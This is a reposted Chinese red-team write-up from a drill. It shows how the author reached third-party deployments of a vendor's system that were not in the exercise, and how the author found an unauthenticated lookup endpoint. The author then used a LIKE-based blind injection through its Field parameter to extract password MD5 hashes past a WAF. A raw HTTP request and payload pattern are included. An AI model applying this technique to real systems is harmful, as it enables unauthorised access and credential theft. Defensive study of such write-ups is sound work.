记一次HW供应链攻击到SQL注入新用法

admin 2024年5月13日00:53:41评论45 views字数 1749阅读5分49秒阅读模式

扫码领资料

获网安教程

记一次HW供应链攻击到SQL注入新用法

记一次HW供应链攻击到SQL注入新用法

# 0.前言 在参加某市攻防演练的时候,发现目标站,经过一系列尝试,包括弱口令、SQL注入等等尝试后,未获得到有效的入口点。在准备放弃之时,看到页脚的banner:xxxxx信息科技有限公司 [!..

文章来源: https://forum.butian.net/share/470

0.前言

在参加某市攻防演练的时候,发现目标站,经过一系列尝试,包括弱口令、SQL注入等等尝试后,未获得到有效的入口点。在准备放弃之时,看到页脚的banner:xxxxx信息科技有限公司

记一次HW供应链攻击到SQL注入新用法

然后有了个想法,到fofa里面搜这个banner,找到一些其他使用该站的,但是没有参与攻防演练的(PS:演练前该单位做过整改弱口令全改了)。

1.旁路进站获取未授权接口

经过尝试,果然皇天不负有心人,进入到了其他厂商的后台,于是开始寻找未授权就能访问的接口或者RCE点,脱代码来审计,从而获取目标权限。

找了一圈,后台没有直接RCE的点,无法脱代码来审计,但是发现了一个有趣的点:

记一次HW供应链攻击到SQL注入新用法

此处查找联系人的接口,存在未授权访问,数据包为:

POST /HanNeng/SelectHelp HTTP/1.1
Content-Length: 29
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ASP.NET_SessionId=vd11thy3qnmgz0h4dtyb51ra; rem=1192
Connection: close

Type=User&Field=UserName&Con=

经过测试发现该处不仅存在未授权访问,Field参数还存在注入。

记一次HW供应链攻击到SQL注入新用法

直接给出部分sql语句:

select count(*) from tb_User where IsDeleted!=1 and Password'

测试过程中发现field是列名,证明如下:

记一次HW供应链攻击到SQL注入新用法

当我认为可以sqlmap一把梭的时候,却发现了这该死的waf:

记一次HW供应链攻击到SQL注入新用法

2.与waf生死缠斗到和平相处

尝试绕过waf:

记一次HW供应链攻击到SQL注入新用法

发现like附近语法错误,这时候想起来根据其他搜索方式,比如工号搜索的时候,应该是模糊匹配的:

记一次HW供应链攻击到SQL注入新用法

发现Con参数的内容应该是进行了模糊匹配,也就是说sql语句可能是:

select count(*) from tb_User where IsDeleted!=1 and userid like '%可控点2%';

可控点2不存在注入,可控点1存在注入但是有waf,这时候就想到一个特别好玩的方法,我把field传入个password是否能获取到password密文呢?

记一次HW供应链攻击到SQL注入新用法

然而并没有,所以呢,猜测此处是这样一个逻辑:

先执行sql语句,确定用户数量:

select count(*) from tb_User where IsDeleted!=1 and userid like '%可控点2%';

然后再执行sql语句筛选用户信息,工号和姓名:

select username,userid from tb_User where IsDeleted!=1 and userid like '%可控点2%';

所以肯定不可能直接把密码传出的,那么就没得搞了么?要么绕过waf,要么还能。。。

select count(*) from tb_User where IsDeleted!=1 and password like '%可控点2%';

这样我只需要构造payload:Type=User&Field=password&Con={遍历}就可以一位一位注入密码了,比如:

记一次HW供应链攻击到SQL注入新用法

记一次HW供应链攻击到SQL注入新用法

用户pageCount数量一直在减少,密码相同的用户一直在减少,但是这里要说明一个点,因为是%可控点%,所以123的前后都有可能有数据,当时我犯了这个错误,导致注入出的md5不全。注入出md5证明如下:

记一次HW供应链攻击到SQL注入新用法

自此就可以和waf和平共存,你防你的大注入,我搞你的小密码。获取完整md5后解密即可登录后台。

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。

原文始发于微信公众号(白帽子左一):记一次HW供应链攻击到SQL注入新用法

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月13日00:53:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次HW供应链攻击到SQL注入新用法https://cn-sec.com/archives/2732646.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息